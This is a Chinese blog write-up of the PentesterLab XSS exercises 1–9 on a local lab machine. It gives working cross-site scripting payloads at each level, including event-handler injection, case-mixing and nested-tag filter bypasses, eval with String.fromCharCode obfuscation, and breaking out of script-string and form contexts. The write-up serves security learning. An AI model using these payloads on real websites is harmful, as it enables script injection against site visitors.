首页 > 其他 > 详细

PentesterLab----xss

时间:2020-05-27 23:19:50      阅读:63      评论:0      收藏:0      [点我收藏+]

xss1  无过滤


name = <script>alert(1)</script>

 

技术分享图片

192.168.195.137/xss/example1.php?name=name=<button type="button" onclick=alert(‘xss‘)>通过按钮点击触发xss
</button> <font size="4" color="blue" onmouseover=alert(‘xss‘)>%20 移动到元素触发xss
%20 </font> <br><select> <option onclick=alert(‘x‘)>onclick点击触发事件
</option> <option values=1 onmousedown=alert(‘ss‘)>onmousedown触发
</option></select> <a href=javascript:alert(‘xss‘)>利用a标签的href属性触发
</a> <br><textarea placeholder=国光的xss测试:键盘按键触发xss onkeypress=alert(‘xss‘)></textarea

 

 

 

xss2   使用大写绕过


发现<script>被过滤了。换一种方式,用大小写:<SCRIPT>alert(1)</SCRIPT>

技术分享图片

 

 

 

 

 

 

xss3        大小写嵌套使用

<script>被过滤了,把script分割开就好了

name=<scri<script>pt>alert(1)</SC</script>RIPT>

 技术分享图片

 

 

 

 

 

 

 

 

xss4

基本的测试输出error


name=<img   src="1"    onerror="alert(1)">

 技术分享图片

 

 

 

 

xss5

在xss4的基础上,alert被过滤了,输出error,利用Img标签和confirm函数

name=<img%20src="1"%20onerror="confirm(1)">

技术分享图片

 

 

 

 

或者用eval函数

name=<img src="1"  onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))">

 

 

String.fromCharCode函数是把输入字符的unicode值转化为字符串,上面这个

 

String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)输出就是:alert(‘xss’)

 

 

技术分享图片

 

 

 

 

 

 

xss6

发现在页面上不会输出什么东西,于是打开F12,查看元素,发现竟然把输入的东西输出到了<script>标签中

技术分享图片

 

 

 

 


熟悉javascript的语法就可以了,闭合双引号,加分号结束var的定义,然后再写一个alert,注释掉后面的语句。

name=xss";alert($a);//

技术分享图片

 

 

技术分享图片

 

 

 

 

 

 

第二种方法

闭合标签

技术分享图片

 

 

输入   11";</script><img src=1 onerror=alert(‘xss‘)><script>
技术分享图片

 

 

 

 

技术分享图片

 

 

 

 

 

 

 

 

xss7

这个和xss6一样的,只不过是把双引号变成单引号了

name=xss’;alert($a);//

第七关 过滤掉了 < >   所以不能使用第6关的 第一种方法 xss‘;</script><img src=1   onerror=alert(‘xss‘)><script>

 

技术分享图片

 

 

 

 

xss8

发现输入的东西被原样输出在页面了,好像没有办法了,但是发现在提交按钮对应的表单中your name没有接收到任何东西

 

技术分享图片

 

 

 

 

输入    /"><script>alert(1)</script>

 


技术分享图片

 

 

 

 

技术分享图片

 

 

 

 

 

技术分享图片

 

 

 

 

或者

 

 

example8.php/"><img src=1 onerror=alert(‘xss‘)><form>

 

 

 

xss9

 

技术分享图片

 

 

 

原来考的是利用location.hash获取url中#后面的部分,这个substring是从第一个字符取到最后 --, 好像并没有什么用。然后document.write写到页面中。

 

 

PentesterLab----xss

原文:https://www.cnblogs.com/xingyuner/p/12977336.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!